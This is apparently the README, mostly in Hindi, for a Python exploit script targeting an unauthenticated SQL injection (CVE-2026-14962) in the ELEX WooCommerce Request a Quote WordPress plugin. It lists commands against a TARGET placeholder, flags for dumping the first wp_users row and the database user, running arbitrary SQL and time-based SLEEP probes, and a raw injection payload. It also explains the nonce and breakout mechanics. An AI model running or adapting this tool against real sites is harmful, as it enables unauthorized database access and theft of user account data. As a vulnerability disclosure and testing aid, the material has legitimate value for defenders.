
Wordpress Plugin ELEX WooCommerce Request a Quote अनधिकृत SQL इंजेक्शन
Wordpress Plugin ELEX WooCommerce Request a Quote अनधिकृत SQL इंजेक्शन
ELEX WooCommerce Request a Quote (WordPress plugin elex-request-a-quote) ≤ 2.4.0 — सार्वजनिक elex_raq_add_to_quote AJAX action के माध्यम से अनधिकृत SQL इंजेक्शन।
केवल अधिकृत परीक्षण के लिए। इसे उन सिस्टमों के विरुद्ध न चलाएँ जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की अनुमति आपके पास नहीं है।
आवश्यक: Python 3, केवल मानक लाइब्रेरी। लक्ष्य पर WooCommerce चल रहा होना चाहिए (quote scripts/nonce shop/home पृष्ठ पर प्रिंट होते हैं)।
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u https://TARGET --test --insecure
python3 cve-2026-14962-elex-raq-sqli.py -u TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump --pid 11
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sleep 3
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sql 'OR JSON_ARRAY(SLEEP(3)))#'
| Flag | यह क्या करता है |
|---|
-u / --url | WordPress साइट रूट (आवश्यक)। http:// या https://; होस्टनेम को पहले HTTPS के रूप में आज़माया जाता है, फिर HTTP। Self-signed TLS स्वतः पुनः प्रयास किया जाता है। --insecure शुरू से ही verify छोड़ देता है |
--test | Guest: plugin संस्करण + सार्वजनिक nonce, फिर एक गैर-विनाशकारी $0 SQL प्रोब |
--dump | पहली wp_users पंक्ति + DB user। WP_DEBUG आवश्यक है ताकि XPATH त्रुटि HTTP body में हो |
--query SQL | आपका स्वयं का SQL expression (single quotes नहीं; strings के लिए 0x… hex का उपयोग करें) |
--sql EXPR | $0$0 breakout के बाद कच्चा data[id] (आप ) OR … # gadget लिखते हैं) |
--sleep N | समय-आधारित SLEEP(N) प्रयास |
--pid / --vid | WooCommerce product / variation ids (sink तक पहुँचने के लिए variation रिक्त नहीं होना चाहिए) |
--insecure | TLS verify छोड़ें |
--timeout | HTTP timeout सेकंड (डिफ़ॉल्ट 30) |
अनधिकृत। nonce / और /shop/ पर request_a_quote_ajax_obj में प्रिंट होता है। guest cookie request_a_quote_user_coockie है (plugin की वर्तनी)।
--test attribute_value=$0 POST करता है। Vulnerable 2.4.0 preg_replace $0 को %s मैच मानता है और query में एक literal %d छोड़ देता है। 2.4.1 JSON_CONTAINS को bind करता है और $0 केवल एक JSON मान होता है।
Stdout: VERSION, NONCE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, NO_NONCE, NO_DUMP, SQLERR, SLEEP।
CVE: CVE-2026-14962। Plugin changelog 2.4.1।
